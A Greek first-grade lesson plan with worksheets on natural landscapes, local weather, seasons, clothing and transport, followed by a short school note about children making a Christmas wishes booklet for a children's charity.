?     Συσχετίζουν τις καιρικές μεταβολές με τη ζωή του ανθρώπου και με τις εποχές του χρόνου.

 

 

Εκτιμώμενη  χρονική διάρκεια12  διδακτικές  ώρες

Είδος Διδακτικής Πρακτικής:   παρατήρηση  εικόνων, παρακολούθηση video, διάλογος, ερωτήσεις-απαντήσεις, ομαδικές εργασίες, βιωματικές ασκήσεις, καταιγισμός ιδεών.

 

Εκπαιδευτικό υλικό: φύλλα εργασίας,  video, τραγούδια, εικόνες-φωτογραφίες (εφημερίδες, περιοδικό, Διαδίκτυο), αποκόμματα εφημερίδων και περιοδικών, χάρτης με τα γεωμορφολογικά χαρακτηριστικά ενός τόπου, σχολικό εγχειρίδιο, καρτέλες με λέξεις και εικόνες, εκπαιδευτικό λογισμικό, poster.

 

Αξιολόγηση της Διδακτικής Πρακτικής: Η αξιολόγηση της Διδακτικής Πρακτικής μπορεί να έχει αναστοχαστικό χαρακτήρα και να πραγματοποιηθεί:

  • τόσο κατά τη διάρκεια εφαρμογής των δραστηριοτήτων (διαμορφωτική αξιολόγηση)

 

  • όσο και στο τέλος της εφαρμογής της Διδακτικής Πρακτικής (τελική αξιολόγηση), για να ακολουθήσει μια εποικοδομητική συζήτηση που θα οδηγήσει σε αναπροσαρμογές, επεκτάσεις κ.λπ.

 

 

ΔΙΑΓΡΑΜΜΑ  ΔΙΔΑΚΤΙΚΟΥ  ΣΕΝΑΡΙΟΥ

Προαπαιτούμενη γνώση: Έχοντας ως δεδομένο πως απευθυνόμαστε σε μαθητές της Α΄ τάξης, προχωρούμε σε έλεγχο της προϋπάρχουσας γνώσης τους στην αρχή κάθε θεματικής ενότητας. Ο έλεγχος γίνεται με τη μορφή ερωτήσεων, ώστε να είναι σαφές τι ακριβώς γνωρίζουν οι μαθητές.

Το επιστημονικό περιεχόμενο: Τα θέματα που πραγματεύεται η συγκεκριμένη ενότητα, συνδυάζουν στοιχεία των ανθρωπιστικών, κοινωνικών και φυσικών επιστημών, όπως: η Γεωγραφία, η Περιβαλλοντική Εκπαίδευση, η Κοινωνιολογία, η Φυσική.

Οι ιδέες των μαθητών-Άλλες δυσκολίες:. Όπως αναφέρθηκε παραπάνω, το γεγονός ότι δε γνωρίζουμε τις ιδέες των μαθητών στο συγκεκριμένο διδακτικό αντικείμενο, γεννά κάποιες δυσκολίες. Μια άλλη δυσκολία που πιθανόν να προέκυπτε,  θα ήταν η ύπαρξη πολλών ομαδικών εργασιών.

Οργάνωση της διδασκαλίας: Οι μαθητές χωρίζονται σε ομάδες των 4 ατόμων. Έρχονται σε επαφή με το εκπαιδευτικό υλικό και πραγματοποιούν τις δραστηριότητες ομαδικά. Ο δάσκαλος παρακολουθεί και βοηθά, όταν χρειαστεί.

Μεθοδολογικές παρεμβάσεις: Σε πρώτο στάδιο, οι μαθητές παρατηρούν, συγκρίνουν και κατηγοριοποιούν τα διάφορα φυσικά τοπία. Σε δεύτερο στάδιο, συνδέουν τα φυσικά τοπία που έμαθαν μ? αυτά του τόπου τους. Στο επόμενο στάδιο, παρατηρούν και καταγράφουν τα καιρικά φαινόμενα του τόπου τους, ώστε στο τέλος να τα συσχετίσουν με τις εποχές, τα επαγγέλματα, τα μέσα συγκοινωνίας και το απαραίτητο ρουχισμό.

 

 

 

 

 

 

ΑΝΑΛΥΤΙΚΗ  ΠΕΡΙΓΡΑΦΗ ΤΩΝ  ΔΡΑΣΤΗΡΙΟΤΗΤΩΝ

Φύλλο  Εργασίας  1

Χρονική διάρκεια:  6  διδακτικές  ώρες

1η  Δραστηριότητα: «Τα φυσικά τοπία»

Οι μαθητές παρατηρούν διάφορες εικόνες με φυσικά τοπία (βουνά, πεδιάδες, ποτάμια, θάλασσα, λίμνες) από το Διαδίκτυο ( www.google.com?Εικόνες?mountains, lakes, plains, rivers, sea) και τις κατατάσσουν σε πίνακα με στήλες ως εξής:

ΣΧΕΔΙΑΓΡΑΜΜΑ ΠΙΝΑΚΑ

ΒΟΥΝΑ ΠΕΔΙΑΔΕΣ ΘΑΛΑΣΣΑ ΠΟΤΑΜΙΑ ΛΙΜΝΕΣ
         
         

 

Παράλληλα οι μαθητές θα καλούνται από τον/την εκπαιδευτικό να χαρακτηρίζουν τα τοπία ως πεδινά, ορεινά ή παραθαλάσσια.

 

2η  Δραστηριότητα:  «Παρατηρώ τον τόπο μου»

Οι μαθητές παρατηρούν το φυσικό περιβάλλον του τόπου τους και ονομάζουν τα συγκεκριμένα γεωμορφολογικά χαρακτηριστικά του στοιχεία (π.χ. ψηλά βουνά, πεδιάδα, παραλίες, θάλασσα κ.ά.). Έπειτα ζωγραφίζουν τον τόπο τους, όπου θα είναι ευδιάκριτα τα γεωμορφολογικά χαρακτηριστικά (βλ. φωτογραφία  1).

 

3η  Δραστηριότητα:  «Τα  επαγγέλματα»

Ο εκπαιδευτικός παροτρύνει τους μαθητές να παρατηρήσουν τις εικόνες του βιβλίου του μαθητή (σελίδα: 71) και να αναφέρουν επαγγέλματα και δραστηριότητες του τόπου τους. Έπειτα συγκρίνουν τον τρόπο ζωής των ανθρώπων (καιρικές συνθήκες, προβλήματα κ.ά.)  με τις δραστηριότητές τους σε τόπους με διαφορετικά γεωμορφολογικά χαρακτηριστικά ( ορεινή/πεδινοί/παραθαλάσσιοι τόποι).

Τέλος οι μαθητές κατασκευάζουν ένα κολλάζ, στο οποίο κατατάσσουν φωτογραφίες  επαγγελμάτων (από περιοδικά, εφημερίδες, διαδίκτυο) σε τρεις κατηγορίες: ορεινοί, πεδινοί, παραθαλάσσιοι ( βλ. φωτογραφία  2).

 

 4η  Δραστηριότητα:  «Τεχνικά έργα»

Οι μαθητές απαριθμούν έργα που έχουν γίνει στον τόπο τους (γέφυρες, λιμάνι) και συνδέουν καθένα από αυτά με συγκεκριμένο πρόβλημα του τόπου τους. Ακόμα, κάνουν  υποθέσεις για τις δυσκολίες που θα αντιμετώπιζαν οι άνθρωποι , εάν δεν είχαν γίνει τα συγκεκριμένα τεχνικά έργα.

 

5η  Δραστηριότητα:  «Περιβαλλοντικά προβλήματα»

Οι μαθητές παρατηρούν τις εικόνες της άσκησης 10 (σελ: 27, Τετράδιο Εργασιών) και συζητούν για τα προβλήματα στο περιβάλλον από τις επεμβάσεις του ανθρώπου.

ΤΕΛΟΣ  ΦΥΛΛΟΥ  ΕΡΓΑΣΙΑΣ  1

 

 

 

 

 

 

 

 

 

Φύλλο  Εργασίας  2

Χρονική διάρκεια:  4  διδακτικές  ώρες

1η  Δραστηριότητα: «Ο καιρός του τόπου μας»

Σε χαρτί του μέτρου που έχει αναρτηθεί στην τάξη έχει φτιαχτεί πίνακας, στην πρώτη στήλη του οποίου γράφονται οι ημέρες της εβδομάδας. Στη δεύτερη στήλη, οι λέξεις κρύο/ζέστη. Στην Τρίτη στήλη, οι λέξεις ήλιος/συννεφιά, στην τέταρτη στήλη βροχή/χιόνι και στην πέμπτη στήλη φυσάει/δε φυσάει.

ΣΧΕΔΙΑΓΡΑΜΜΑ ΠΙΝΑΚΑ

Ο ΚΑΙΡΟΣ ΤΟΥ ΤΟΠΟΥ ΜΑΣ

ΗΜΕΡΕΣ

ΕΒΔΟΜΑΔΑΣ

Κρύο    ή

Ζέστη

Ήλιος   ή

Συννεφιά

Βροχή   ή

Χιόνι

Φυσάει   ή

Δε φυσάει

ΔΕΥΤΕΡΑ

ΤΡΙΤΗ

ΤΕΤΑΡΤΗ

ΠΕΜΠΤΗ

ΠΑΡΑΣΚΕΥΗ

ΣΑΒΒΑΤΟ

ΚΥΡΙΑΚΗ

 

Τα παιδιά καταγράφουν καθημερινά, για μια εβδομάδα, στον πίνακα τις παρατηρήσεις τους (γραπτώς ή με σχέδια-ζωγραφιές).

Είναι σημαντικό, ο πίνακας να αναρτηθεί τουλάχιστον μία εβδομάδα πριν αρχίσει η διδασκαλία για τον καιρό του τόπου μας, ώστε να ακολουθήσει συζήτηση σε βάθος(βλ. φωτογραφία  3 ).

 

2η  Δραστηριότητα:  «Δελτίο καιρού»

Οι μαθητές παρακολουθούν βίντεο με δελτίο καιρού από το Διαδίκτυο (www.youtube.com?Δελτίου καιρού). Στη συνέχεια ακολουθεί συζήτηση-σχολιασμός του με έμφαση το συμβολισμό και το λεξιλόγιο που χρησιμοποιείται.

3η  Δραστηριότητα:  «Τι καιρό κάνει;»

Οι μαθητές αναζητούν προβλέψεις καιρού σε εφημερίδες και περιοδικά και συγκεντρώνουν αποκόμματα. Έπειτα, συνθέτουν ένα κολλάζ με τα αποκόμματα και ακολουθεί συζήτηση σχετικά με το συμβολισμό που χρησιμοποιείται (βλ. φωτογραφία  4).

 

4η  Δραστηριότητα:  «Τι να φορέσω;»

Οι μαθητές εκφράζουν τη γνώμη τους για το είδος των ρούχων που πρέπει να φορούν σε κάθε εποχή του χρόνου. Στη συνέχεια, χρωματίζουν εικόνες με διάφορα ρούχα (π.χ. κασκόλ, μπουφάν, αδιάβροχο κ.ά.) και  τις κολλούν σε χαρτόνι, ταξινομώντας τις πρώτα ανά εποχή (βλ. φωτογραφία  5).

 

5η  Δραστηριότητα:  «Οι  τέσσερις εποχές και οι δώδεκα μήνες»

Οι μαθητές φτιάχνουν κατασκευή σε μεγάλο χαρτόνι με θέμα: «Οι τέσσερις εποχές του χρόνου». Μπορούν να χρησιμοποιήσουν υλικά από την καθημερινή ζωή ή το φυσικό περιβάλλον (π.χ. βαμβάκι, ρύζι, άμμος, χορτάρι κ.λπ.).

Παράλληλα, γίνεται συζήτηση για τον καιρό σε κάθε εποχή και τους μήνες του χρόνου (βλ. φωτογραφία   6,7,8).

 

6η  Δραστηριότητα:  «Μουσική και Τέχνη»

Οι μαθητές παρατηρούν πίνακες ζωγραφικής  από το Διαδίκτυο και αναφέρουν την εποχή που αντιπροσωπεύει ο καθένας τους.

Έπειτα ακούνε τις τέσσερις εποχές του Βιβάλντι και προσπαθούν να αναγνωρίσουν  την εποχή στην οποία αναφέρεται το κάθε κομμάτι.

Τέλος, ζωγραφίζουν μία εικόνα από την εποχή του χρόνου που αγαπούν περισσότερο.

ΤΕΛΟΣ  ΦΥΛΛΟΥ  ΕΡΓΑΣΙΑΣ

Φύλλο  Εργασίας  3

Χρονική διάρκεια:  2  διδακτικές  ώρες

1η  Δραστηριότητα:  «Μέσα συγκοινωνίας»

Οι μαθητές ανακοινώνουν στην τάξη τις εμπειρίες τους, σχετικά με το πώς μετακινούνται καθημερινά οι γονείς τους και πώς ταξιδεύουν.

Στη συνέχεια παρατηρούν εικόνες που δείχνουν διάφορα μέσα συγκοινωνίας, τα ονομάζουν και τα κατηγοριοποιούν προφορικά σε: ξηράς, θάλασσας και αέρα.

 

2η  Δραστηριότητα:  «Χαρούμενες κατασκευές»

Οι μαθητές κατασκευάζουν διάφορα μέσα συγκοινωνίας (βλ. φωτογραφία  9,10,11,12) με διάφορα κουτιά συσκευασιών που συγκεντρώνουν στην τάξη τους (π.χ. κουτιά από τρόφιμα, μπουκάλια, καπάκια, φελλούς).

ΤΕΛΟΣ  ΦΥΛΛΟΥ  ΕΡΓΑΣΙΑΣ  3


ΑΝΑΣΤΟΧΑΣΜΟΣ:  Κατά το σχεδιασμό των δραστηριοτήτων, θα μπορούσαν να έχουν χρησιμοποιηθεί και άλλα είδη διδακτικών πρακτικών, όπως για παράδειγμα το  παιχνίδι ρόλων ή η δραματοποίηση ή η διδακτική επίσκεψη, χωρίς όμως αυτό να σημαίνει απαραίτητα καλύτερα μαθησιακά αποτελέσματα.

 

 

 

 

 

 

ΑΞΙΟΛΟΓΗΣΗ:   Οι  μαθητές ανταποκρίθηκαν θετικά καθ? όλη τη διάρκεια της εκπαιδευτικής διαδικασίας. Έδειξαν ενδιαφέρον και προθυμία να εργαστούν ομαδικά για τη διεκπεραίωση διάφορων εργασιών. Εμπέδωσαν σε ικανοποιητικό βαθμό τη διδακτέα ύλη, ενώ παράλληλα αντάλλαξαν σκέψεις και ιδέες. Ακόμα, εκφράστηκαν δημιουργικά, συνθέτοντας ή κατασκευάζοντας ομαδικές εργασίες (π.χ. κατασκευές οχημάτων κ.ά.). Τέλος, εξάσκησαν δεξιότητες, όπως η παρατήρηση, η ταξινόμηση κ.λπ.

 

 

 

 

 

 

 

 

ΠΑΡΑΡΤΗΜΑ ΦΩΤΟΓΡΑΦΙΩΝ

Φωτογραφία 1

Φωτογραφία2Φωτογραφία 3

Φωτογραφία  4

Φωτογραφία  5

Φωτογραφία  6

                                                         Φωτογραφία  7

Φωτογραφία  8

Φωτογραφία  9

                                                             Φωτογραφία  10

Φωτογραφία  11

Φωτογραφία  12

‘ Το Χαμόγελο του Παιδιού ‘

Στα πλαίσια της εθελοντικής προσφοράς τροφίμων για το ‘Χμόγελο του Παιδιού’ από τις οικογένειες όλων των μαθητών με πρωτοβουλία του Δ.Σ Γονέων και Κηδεμόνων, πήραμε την απόφαση με τους μαθητές της Α’ Τάξης να δημιουργήσουμε ένα αλφαβητάριο με χριστουγεννιάτικες ευχές.
  Τα παιδιά ζωγράφισαν ατομικά από μια ζωγραφιά με ευχές για τους φίλους τους στο ‘Χαμόγελο του Παιδιού’. Στο τέλος συγκεντρώσαμε όλες τις ζωγραφιές και δημιουργήθηκε ένα μικρό βιβλίο με τίτλο ” Το αλφαβητάρι των Χριστουγεννιάτικων Ευχών ”
Η δραστηριότητα αυτή κινήθηκε στο πνεύμα της προσφοράς αυτές τις χαρμόσυνες ημέρες στους ανθρώπους που πραγματικά μας έχουν ανάγκη… Από καρδιάς λοιπόν, τις καλύτερες ευχές μας…